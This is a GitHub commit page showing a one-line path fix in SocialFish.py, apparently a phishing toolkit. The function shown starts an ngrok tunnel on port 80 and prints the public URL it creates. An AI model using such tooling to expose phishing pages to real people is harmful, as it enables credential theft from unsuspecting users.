Skip to content

Commit

Permalink
misc
Browse files Browse the repository at this point in the history
  • Loading branch information
adiranas committed Feb 8, 2018
1 parent 9cdb6bb commit 837b2bc
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion SocialFish.py
Original file line number Diff line number Diff line change
Expand Up @@ -178,7 +178,7 @@ def runNgrok():
system('./Server/ngrok http 80 > /dev/null &')
sleep(10)
system('curl -s -N http://127.0.0.1:4040/status | grep "https://[0-9a-z]*\.ngrok.io" -oh > ngrok.url')
url = open('./ngrok.url', 'r')
url = open('ngrok.url', 'r')
print('\n {0}[{1}*{0}]{1} Ngrok URL: {2}' + url.readlines()[0] + '{1}').format(CYAN, END, GREEN)
url.close()

Expand Down

0 comments on commit 837b2bc

Please sign in to comment.